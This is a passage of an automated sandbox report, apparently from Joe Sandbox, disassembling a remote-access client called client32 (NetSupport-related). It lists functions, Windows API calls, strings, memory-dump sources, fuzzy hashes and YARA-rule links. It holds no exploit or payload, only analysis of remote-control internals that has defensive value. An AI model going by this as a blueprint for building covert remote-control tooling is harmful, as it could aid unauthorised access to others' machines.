Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792

Function 68C68D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,68C767B5), ref: 68C68D6B

Part of subcall function 68C64F70: LoadLibraryA.KERNEL32(psapi.dll,?,68C68DC8), ref: 68C64F78

GetCurrentProcessId.KERNEL32 ref: 68C68DCB
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 68C68DD8
FreeLibrary.KERNEL32(?), ref: 68C68EBF

Part of subcall function 68C64FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68C64FC4
Part of subcall function 68C64FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68C68E0D,00000000,?,68C68E0D,00000000,?,00000FA0,?), ref: 68C64FE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68C68EAE

Part of subcall function 68C65000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68C65014
Part of subcall function 68C65000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68C68E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68C65034

Part of subcall function 68C62420: _strrchr.LIBCMT ref: 68C6242E

Strings

Set Is247=%d, xrefs: 68C68ED7
NSM247, xrefs: 68C68D8B
is247, xrefs: 68C68D42
CLIENT247, xrefs: 68C68DA7
NSM247Ctl.dll, xrefs: 68C68E7E
pcictl_247.dll, xrefs: 68C68E6C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: 306c1b92065607113c958b9f2695cc2adeef8afaad880ef77f12afba082ba664
Instruction ID: 71f1b36e594621adf98b9f1e3c5247741ffa1b89bc475356ebbcc79f0641790e
Opcode Fuzzy Hash: 306c1b92065607113c958b9f2695cc2adeef8afaad880ef77f12afba082ba664
Instruction Fuzzy Hash: D441A3B9D402199BDB108F55DCC5FEE77B8EB46758F8000B5EA15A3240FB70DA85CBA1

Function 110FFE60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3

GetCurrentThreadId.KERNEL32 ref: 110FFE7C
GetThreadDesktop.USER32(00000000), ref: 110FFE83
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
SetThreadDesktop.USER32(00000000), ref: 110FFEA0
CloseDesktop.USER32(00000000), ref: 110FFEB9
GetLastError.KERNEL32 ref: 110FFEC1
CloseDesktop.USER32(00000000), ref: 110FFED7
GetLastError.KERNEL32 ref: 110FFEDF

Strings

SetThreadDesktop(%s) ok, xrefs: 110FFEAB
SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3

Function 1115AB80 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
GetLastError.KERNEL32 ref: 1115ABB5
wsprintfA.USER32 ref: 1115ABC8

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19

Strings

..\ctl32\wndclass.cpp, xrefs: 1115ABD9, 1115ABF5
NSMDropTarget, xrefs: 1115AC0E
NSMReflect, xrefs: 1115AC07
GlobalAddAtom failed, e=%d, xrefs: 1115ABC2
NSMWndClass, xrefs: 1115ABA0
m_aProp, xrefs: 1115ABFA

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A

Function 1110D060 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1110D0CA
__CxxThrowException@8.LIBCMT ref: 1110D0DF
GetCurrentThreadId.KERNEL32 ref: 1110D0F6
InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000004C4), ref: 1110D109
InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000004C4), ref: 1110D118
EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF

Strings

QueueThreadEvent, xrefs: 1110D16B
..\ctl32\Refcount.cpp, xrefs: 1110D166

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 144328431-1024648535
Opcode ID: 9bf6e749eb4aa396e4371d48aecc328a042bee4d9b99b0343c33cbf1c1c517ad
Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
Opcode Fuzzy Hash: 9bf6e749eb4aa396e4371d48aecc328a042bee4d9b99b0343c33cbf1c1c517ad
Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51

Function 11158220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,62C07B5E,?,00000000,00000001), ref: 11158267
CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
wsprintfW.USER32 ref: 111582A7
SysAllocString.OLEAUT32(?), ref: 111582B3
wsprintfW.USER32 ref: 11158367
SysFreeString.OLEAUT32(?), ref: 11158408

Strings

root\CIMV2, xrefs: 111582A1
SELECT * FROM %s, xrefs: 11158361
WQL, xrefs: 11158380

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51

Function 11112B00 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11112B55
CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
CoUninitialize.COMBASE(00000000), ref: 11112C61

Strings

SHGetSettings, xrefs: 11112BA0
SHELL32.DLL, xrefs: 11112B85

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61

Function 68C80D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,68C80F2B,21B321B5,00000000,?,?,68C9F278,000000FF,?,68C6AE0A,?,00000000,?,00000080), ref: 68C80D48
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 68C80D5B
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-68CACB4C,?,?,68C9F278,000000FF,?,68C6AE0A,?,00000000,?,00000080), ref: 68C80D76
_malloc.LIBCMT ref: 68C80D8C

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,68C9F278,000000FF,?,68C6AE0A,?,00000000,?), ref: 68C80D9F
_free.LIBCMT ref: 68C80D84

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C80DAF

Strings

IPHLPAPI.DLL, xrefs: 68C80D41
GetAdaptersAddresses, xrefs: 68C80D55

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 1360380336-1843585929
Opcode ID: a9440aa87425f971dd5ab27eea60953e33777ba948c1de302de74996ee1e917d
Instruction ID: 8506965cfaa98bd0635069ca623d428b335cbb02239273f123c0dc8a9e31af6c
Opcode Fuzzy Hash: a9440aa87425f971dd5ab27eea60953e33777ba948c1de302de74996ee1e917d
Instruction Fuzzy Hash: 240184F5280301AFE6308B749C99F6B7AECAB41B08F50491DF5659B280FA71F845CB64

Function 11141AB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74

_memset.LIBCMT ref: 11141AF5
GetVersionExA.KERNEL32(?), ref: 11141B0E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
FreeLibrary.KERNEL32(00000000), ref: 11141B5F
GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

Strings

GetUserDefaultUILanguage, xrefs: 11141B41
kernel32.dll, xrefs: 11141B20

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92

Function 110151F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110152AA
_memset.LIBCMT ref: 110152EE
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328

Strings

SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
PackedCatalogItem, xrefs: 11015312
NSLSP, xrefs: 11015338
%012d, xrefs: 110152A4

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
